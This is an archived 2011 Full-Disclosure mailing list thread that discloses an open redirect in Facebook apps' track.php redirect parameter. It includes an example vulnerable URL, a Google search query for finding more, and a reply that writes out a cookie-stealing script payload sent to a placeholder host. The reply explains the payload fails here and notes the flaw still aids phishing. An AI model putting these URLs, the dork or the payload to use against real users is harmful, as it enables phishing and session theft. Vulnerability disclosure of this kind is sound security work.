[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: Re: [Full-disclosure] Facebook URL Redirect Vulnerability
From: Javier Bassi <javierbassi () gmail ! com>
Date: 2011-02-28 21:32:59
Message-ID: AANLkTik+9Eo5QKyACQ2TCQDUPk3=XVeRHuQUJvueiqSn () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
Since Facebook uses a 302 redirect, the attacker can't steal victim's cookie
with a link like this:
http://apps.facebook.com/truthsaboutu/track.php?r=h<http://apps.facebook.com/truthsaboutu/track.php?r=http://www.securitypentest.com>
ttp://someurl.com/?cookie=<script>document.write(document.cookie)</script>
But still, this can be useful for a phishing attack.
On Mon, Feb 28, 2011 at 2:42 PM, Nathan Power <np@securitypentest.com>wrote:
> ------------------------------------------------------------------
> 1. Summary:
>
> Once the victim clicks on a specially crafted Facebook URL they can be
> redirected to a malicious website.
> ------------------------------------------------------------------
> 2. Description:
>
> Facebook applications use of 'track.php?r=' doesn't sanitize the
> redirection input properly. This allows an attacker to input any URL that a
> victim will get redirected too. It is not required for the victim to be
> login to Facebook for this attack to work.
>
> The following is an example of a vulnerable URL:
>
> http://apps.facebook.com/truthsaboutu/track.php?r=http://www.securitypentest.com
>
> The following Google search query can be used to find vulnerable URLs:
> site:facebook.com inurl:"track.php?" inurl:"r="
> ------------------------------------------------------------------
> 3. Impact:
>
> Potentially allow an attacker to compromise a victim’s Facebook account
> and/or computer system.
> ------------------------------------------------------------------
> 4. Affected Products:
>
> www.facebook.com
> ------------------------------------------------------------------
> 5. Solution: None
> ------------------------------------------------------------------
> 6. Time Table:
>
> 2/27/2011 Reported Vulnerability to the Vendor
> ------------------------------------------------------------------
> 7. Credits:
>
> Discovered by Nathan Power
> www.securitypentest.com
> ------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
[Attachment #5 (text/html)]
Since Facebook uses a 302 redirect, the attacker can't steal victim's cookie with a \
link like this: <br><div><span class="Apple-style-span" style="border-collapse: collapse; \
color: rgb(51, 51, 51); font-family: arial, sans-serif; font-size: 13px; "><a \
href="http://apps.facebook.com/truthsaboutu/track.php?r=http://www.securitypentest.com" \
target="_blank" style="color: rgb(51, 51, 51); \
">http://apps.facebook.com/truthsaboutu/track.php?r=h</a>ttp://<a \
href="http://someurl.com/?cookie=">someurl.com/?cookie=</a></span><script>document.write(document.cookie)</script><br>
But still, this can be useful for a phishing attack.</div><div><br><div class="gmail_quote">On \
Mon, Feb 28, 2011 at 2:42 PM, Nathan Power <span dir="ltr"><<a \
href="mailto:np@securitypentest.com">np@securitypentest.com</a>></span> wrote:<br>
<blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc \
solid;padding-left:1ex;">------------------------------------------------------------------<br>1. \
Summary:<br><br>Once the victim clicks on a specially crafted Facebook URL they can be \
redirected to a malicious website.<br>
------------------------------------------------------------------<br>
2. Description:<br><br>Facebook applications use of 'track.php?r=' doesn't sanitize \
the redirection input properly. This allows an attacker to input any URL that a victim will \
get redirected too. It is not required for the victim to be login to Facebook for this attack \
to work.<br>
<br>The following is an example of a vulnerable URL:<br><a \
href="http://apps.facebook.com/truthsaboutu/track.php?r=http://www.securitypentest.com" \
target="_blank">http://apps.facebook.com/truthsaboutu/track.php?r=http://www.securitypentest.com</a><br>
<br>The following Google search query can be used to find vulnerable URLs:<br>site:<a \
href="http://facebook.com" target="_blank">facebook.com</a> inurl:"track.php?" \
inurl:"r="<br>------------------------------------------------------------------<br>
3. Impact:<br><br>Potentially allow an attacker to compromise a victim’s Facebook account \
and/or computer system.<br>------------------------------------------------------------------<br>4. \
Affected Products:<br><br><a href="http://www.facebook.com" \
target="_blank">www.facebook.com</a><br>
------------------------------------------------------------------<br>5. Solution: \
None<br>------------------------------------------------------------------<br>6. Time \
Table:<br><br>2/27/2011 Reported Vulnerability to the Vendor<br>
------------------------------------------------------------------<br>7. \
Credits:<br><br>Discovered by Nathan Power<br><a href="http://www.securitypentest.com" \
target="_blank">www.securitypentest.com</a><br>------------------------------------------------------------------<br>
<br>_______________________________________________<br>
Full-Disclosure - We believe in it.<br>
Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" \
target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html</a><br> Hosted and \
sponsored by Secunia - <a href="http://secunia.com/" \
target="_blank">http://secunia.com/</a><br></blockquote></div><br></div>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic